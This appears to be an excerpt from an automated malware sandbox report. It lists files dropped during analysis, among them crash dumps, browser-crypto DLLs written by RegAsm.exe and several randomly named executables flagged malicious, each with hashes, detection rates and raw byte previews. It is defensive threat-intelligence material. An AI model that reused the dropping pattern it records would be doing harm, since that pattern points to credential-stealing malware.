Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.2.8.4.7.0.4.7.7.6.0.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.2.8.4.7.1.3.2.1.3.5.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.4.c.5.6.6.e.-.e.3.2.2.-.4.9.2.1.-.b.6.e.e.-.2.2.5.f.5.4.4.f.b.1.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.b.6.f.a.1.5.-.b.b.c.4.-.4.8.4.c.-.a.6.6.e.-.0.a.1.3.c.9.f.5.f.9.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.8.-.0.0.0.1.-.0.0.1.4.-.0.5.e.f.-.b.2.7.2.9.e.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.1.7.2.0.b.6.8.9.2.e.f.3.8.2.5.e.3.9.f.7.1.7.8.5.8.4.f.f.f.8.5.8.e.c.3.f.7.3.e.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA95.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Oct 2 07:41:11 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	189164
Entropy (8bit):	4.107714595889427
Encrypted:	false
SSDEEP:	3072:W1lOBiZWsyWBW5n4uEqGMznKrcLTgvBNx+YCc7Z0:W1lOXsyrn4PMntTgvBN9x
MD5:	4595DB1E11AB161582B5295AA63A2CA4
SHA1:	602B1484CC70DA6576EEB28E27605771D8D61C19
SHA-256:	A0A8230EBBF6BB7DAFC913813EC6E02931C96949A37CCC6C50AA0E56CBA15052
SHA-512:	E5C604FEF55E2D5172303AF58DD7852D202689FDC8B6BCFCDA4510E3A91E3C122CF691558B74574EF384575F36DA9AAD8668FBF6079E150C8BA6C5A38790F7BD
Malicious:	false
Preview:	MDMP..a..... ..........f........................x...........$...........d ...9..........`.......8...........T............%..\...........4........... ...............................................................................eJ..............GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACC9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8396
Entropy (8bit):	3.691391362373877
Encrypted:	false
SSDEEP:	192:R6l7wVeJaq6Op6Y9LSUD+ngGgmfZyFpr+89b3asf0bdm:R6lXJH6Y6YhSUDWBgmfov35fV
MD5:	EBE2027E7FF12BCEFA8C359431B96E08
SHA1:	58F2A9F7704E26519555D5B615165919EC084C9E
SHA-256:	52C72DB2D6076425562C94AF32A86C6EAB8E2F8659E127325F2C7F0DF5683410
SHA-512:	A4C93E7DDE563D3BF8596DC1FD39CCFDA5C54D8052FB1E929712C9F5305C80409C1E8937B9C2F279ACB245F4903541BCA16212C4FAA935A1BA90853AD6FEC64A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACF9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4751
Entropy (8bit):	4.471142536807277
Encrypted:	false
SSDEEP:	48:cvIwWl8zsgJg77aI9EnWpW8VYvIYm8M4Jcg6EO7F1/I+q8vC6EOa7T7p7wd:uIjfmI76W7VsJcgfw/IKCfn7T7p7wd
MD5:	95ECC9291404BFB5B4F123BC710424CB
SHA1:	93B8C459967CCBDF319E613E78A19208D44C19CF
SHA-256:	98110D205F563635CEB8544DE2178BAFE8C25825EC13418FB6F49CADDC49FB24
SHA-512:	82920272E864088A3033D08386BD720621C744F064E58FEF07FA1046DA6C35619FCCC04F3C079F5C0E1691D0F599AEAD72AE87ABF97F86D70F5D3F20C44A945B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525523" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCD3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Oct 2 07:41:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	187972
Entropy (8bit):	4.125454602805401
Encrypted:	false
SSDEEP:	3072:MudIgVP+LGGV/XG14yoV4uEqGEoxerLTgqiu77I:M6IcFmfyoV4P9YTgqD7
MD5:	B3456326C57C4A6F7F6A9DC366116FFF
SHA1:	05D70F3DB46DE9946E064DA0B9B8679037824162
SHA-256:	9E292B630E47BD0475F5D180738A3662F2B0192E75F6C85A1450EBCDCC4C2F5E
SHA-512:	8E80D95228B1BE88754F637C3601324960A447E2CAB24E7866FCAFBC686D893DE2D7F79991F3D0F73F2389B7C5908450023F65BD4EEEAF8CC0A992C609226DD7
Malicious:	false
Preview:	MDMP..a..... ..........f........................x...........$............ ...9..........`.......8...........T............%..............4........... ...............................................................................eJ..............GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDCE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8396
Entropy (8bit):	3.69322238927237
Encrypted:	false
SSDEEP:	192:R6l7wVeJiT6w6Y9oSUTLEgmfZyFpra89b/Msfk1m:R6lXJG6w6YySUTLEgmfob/ffb
MD5:	A66B3267CBBDDF0CF6A1429873841C4E
SHA1:	F3FF3CDAF975C848DC2DECD24B09E4503E25093C
SHA-256:	DC4828B4869F9ADB0899F5A08F617E5474327903438110B3393CA2E6E36FACD0
SHA-512:	F2FB981E842034E7C2379B7D9741652250A61AEA6C836FFC22250A60D05EF7A7AC1FD3445AD326806E2F8F473440971CC64CE796B1FFAFA0A7E50947E1F41A66
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDEE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4751
Entropy (8bit):	4.472592666212443
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9EnWpW8VYT6Ym8M4Jcg6EO7FB+q8vC6EOw7T7p7md:uIjfHI76W7VAzJcgfGKCfd7T7p7md
MD5:	98629D95B9471D5F146942386D582134
SHA1:	4ACCA500FFBEA9D4238AB160795050B63FDE981F
SHA-256:	7B721190F374B348F74D027523D9FA6E46F329D89724059439B3202FCFE411B0
SHA-512:	CC6206DEA0685505181DC62A83B16247799F6A504AA709AE58AFB7E4CA833316C83D332D56050700BCFCDFDCEF20761BCF354C65033395A1C097EB6EEC0C7E14
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525524" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\userBAKKEGCAAE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	391072
Entropy (8bit):	7.987128579531616
Encrypted:	false
SSDEEP:	6144:7RNcX3Y/L03IZz1t0oQqXl8uRa2rIfpympCmd75n3L2BdEtD+gEO:7RNcXoIYZz1t0IDr2y9md75bAy1rEO
MD5:	C7E7CFC3ED17AEF6C67C265389593EE3
SHA1:	44AAEA45A59F194F33FF435A430FCBD9E7434AD5
SHA-256:	0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
SHA-512:	6C5F7A6626AAC4B583D1165C4EA3BC69E315CDCE94D3E1D3442DC9643E0983F2A80E0495BAC79D4AA0E4DB309F0AAB373D917E6AF12FFAAD333ABA21E16249D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................ ........@.. ..............................."....`.....................................S.......B...........x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.......................H.......@... ..............................................................[(<.sT.w/.....x~I......T..T5Q>.z.....b.S./....2E.w.>../.d..t_.s........o>...............UV.S.....a5..JK....Y.w......#....s."....-d..-7..av..n.\....]............L...t...:2o1.!.......q9_O......K.^...."...)0...3..$.5.,..}.....3cx.z.....2I}.......I.e...$. .....V ..OG...Ua.$+...%\.B-.U...3....nc...,..lf...f.o..`. bO.c2...R..]0o.f....<.9..^n\.....\..2....=.nk..7 .,o.8.#.b...*.T..g}qB.[

C:\Users\userCAAKKFHCFI.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	391072
Entropy (8bit):	7.987128579531616
Encrypted:	false
SSDEEP:	6144:7RNcX3Y/L03IZz1t0oQqXl8uRa2rIfpympCmd75n3L2BdEtD+gEO:7RNcXoIYZz1t0IDr2y9md75bAy1rEO
MD5:	C7E7CFC3ED17AEF6C67C265389593EE3
SHA1:	44AAEA45A59F194F33FF435A430FCBD9E7434AD5
SHA-256:	0DDEBB36BEB37631DF17F68A14C90519F93BA7C200C62003527273119442E1FF
SHA-512:	6C5F7A6626AAC4B583D1165C4EA3BC69E315CDCE94D3E1D3442DC9643E0983F2A80E0495BAC79D4AA0E4DB309F0AAB373D917E6AF12FFAAD333ABA21E16249D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..f................................ ........@.. ..............................."....`.....................................S.......B...........x...(&..........`................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.......................H.......@... ..............................................................[(<.sT.w/.....x~I......T..T5Q>.z.....b.S./....2E.w.>../.d..t_.s........o>...............UV.S.....a5..JK....Y.w......#....s."....-d..-7..av..n.\....]............L...t...:2o1.!.......q9_O......K.^...."...)0...3..$.5.,..}.....3cx.z.....2I}.......I.e...$. .....V ..OG...Ua.$+...%\.B-.U...3....nc...,..lf...f.o..`. bO.c2...R..]0o.f....<.9..^n\.....\..2....=.nk..7 .,o.8.#.b...*.T..g}qB.[

C:\Users\userDHDAFBFCFH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423840
Entropy (8bit):	7.988954975057422
Encrypted:	false
SSDEEP:	12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
MD5:	237AF39F8B579AAD0205F6174BB96239
SHA1:	7AAD40783BE4F593A2883B6A66F66F5F624D4550
SHA-256:	836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
SHA-512:	DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8.........Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.\|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._.....7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

C:\Users\userEHJDHJKFIE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	423840
Entropy (8bit):	7.988954975057422
Encrypted:	false
SSDEEP:	12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
MD5:	237AF39F8B579AAD0205F6174BB96239
SHA1:	7AAD40783BE4F593A2883B6A66F66F5F624D4550
SHA-256:	836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
SHA-512:	DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8.........Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.\|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._.....7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\596a8ed0706146e48ded9036d0de8611.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
